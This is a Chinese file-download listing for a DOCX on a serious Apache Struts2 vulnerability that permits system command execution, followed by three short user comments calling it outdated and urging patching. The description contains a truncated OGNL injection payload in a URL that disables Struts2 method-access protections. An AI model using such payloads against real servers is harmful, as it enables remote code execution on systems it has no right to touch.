1. 首页
  2. 编程语言
  3. Java
  4. Apache的Struts2框架严重安全漏洞

Apache的Struts2框架严重安全漏洞

上传者: 2019-03-14 08:19:25上传 DOCX文件 13.83KB 热度 34次
Apache的Struts2框架最近出了一个很严重的漏洞,可以直接执行系统命令 http://www.163.com?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%2
用户评论
码姐姐匿名网友 2019-03-14 08:19:25

已经过时了,现在有更多其他的包,反正struts2 就不安全。

码姐姐匿名网友 2019-03-14 08:19:25

这个漏洞很多人都知道了,都不上了

码姐姐匿名网友 2019-03-14 08:19:25

最近struts2的漏洞很猖狂,得赶紧把漏洞修补上